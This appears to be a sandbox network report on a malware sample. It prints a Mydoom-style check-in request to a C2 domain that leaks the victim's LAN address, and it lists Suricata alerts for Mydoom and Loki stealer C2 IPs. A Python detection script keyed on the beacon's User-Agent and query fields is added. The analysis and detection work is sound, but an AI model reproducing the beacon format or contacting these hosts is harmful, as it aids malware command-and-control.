Network Analysis
IP Address | Status | Action | VT | Location |
---|---|---|---|---|
No hosts contacted. | | | | |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
No traffic
No traffic
HTTP traffic
Method | Data | URL |
---|---|---|
GET | 0 | http://epsaphpaaa.ws/imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS |
Request:
GET /imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS HTTP/1.1
Host: epsaphpaaa.ws
User-Agent: explwer
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.168.209:49273 -> 64.70.19.203:80 | 2807186 | ETPRO MALWARE Worm.Mydoom Checkin | Malware Command and Control Activity Detected |
TCP 192.168.168.209:49273 -> 64.70.19.203:80 | 2807187 | ETPRO MALWARE User-Agent (explwer) | A Network Trojan was detected |
TCP 192.168.168.209:49275 -> 35.164.78.200:80 | 91379183 | ThreatFox Loki Password Stealer (PWS) botnet C2 traffic (ip:port - confidence level: 75%) | A Network Trojan was detected |
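The two ETPRO alerts on flow 192.168.168.209:49273 -> 64.70.19.203:80 fire on the same request shown in the HTTP section: the User-Agent string `explwer` and the check-in URL whose query carries an id, a numeric `s5` value, the victim's own LAN address in `lip` and a `win` tag. The script below is an added example (not tooling from the sandbox and not a Suricata rule) that parses that request and reports the indicators a detection engineer would key on. The request text is constructed from the lines above; the User-Agent and query keys come from this report, while treating any `id`/`s5`/`lip`/`win` query to a `.php` endpoint as a check-in beacon is an assumption made for the example.

```python
"""Parse the captured check-in request and flag its indicators.

Added example for this report; not the sandbox's own code. The sample request
is constructed from the HTTP section of the report.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed from the request shown in the report's HTTP section.
SAMPLE_REQUEST = (
    "GET /imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS HTTP/1.1\r\n"
    "Host: epsaphpaaa.ws\r\n"
    "User-Agent: explwer\r\n"
    "\r\n"
)

# "explwer" is the User-Agent the ETPRO alert matched in this report.
MALICIOUS_USER_AGENTS = {"explwer"}
# Query keys of the check-in URL in this report. Assumption for the example:
# any .php request carrying all four keys is treated as a beacon.
CHECKIN_KEYS = {"id", "s5", "lip", "win"}


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into method, target, version, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def checkin_params(target):
    """Return the query parameters of a request target as single values."""
    query = urlsplit(target).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def detect(req, sandbox_ip=None):
    """Return the list of indicator descriptions that match this request."""
    hits = []
    ua = req["headers"].get("user-agent", "")
    if ua in MALICIOUS_USER_AGENTS:
        hits.append(f"known-bad User-Agent: {ua}")

    params = checkin_params(req["target"])
    path = urlsplit(req["target"]).path
    if path.endswith(".php") and CHECKIN_KEYS.issubset(params):
        hits.append("check-in beacon: id/s5/lip/win query to a .php endpoint")

    # The beacon reports the host's own LAN address; a private address in a
    # query string leaving the network is worth an alert on its own.
    lip = params.get("lip")
    if lip:
        try:
            addr = ipaddress.ip_address(lip)
        except ValueError:
            addr = None
        if addr is not None and addr.is_private:
            hits.append(f"private address leaked in query: {lip}")
        if sandbox_ip and lip == sandbox_ip:
            hits.append("lip equals the analysis host address: the value is the victim's own IP")
    return hits


if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    for hit in detect(req, sandbox_ip="192.168.168.209"):
        print("ALERT:", hit)
```

Note that the contacted-host and DNS tables above are empty even though this flow and the second flow to 35.164.78.200:80 were seen by Suricata, so the host list in this report should be treated as incomplete rather than as evidence of no network contact.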
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts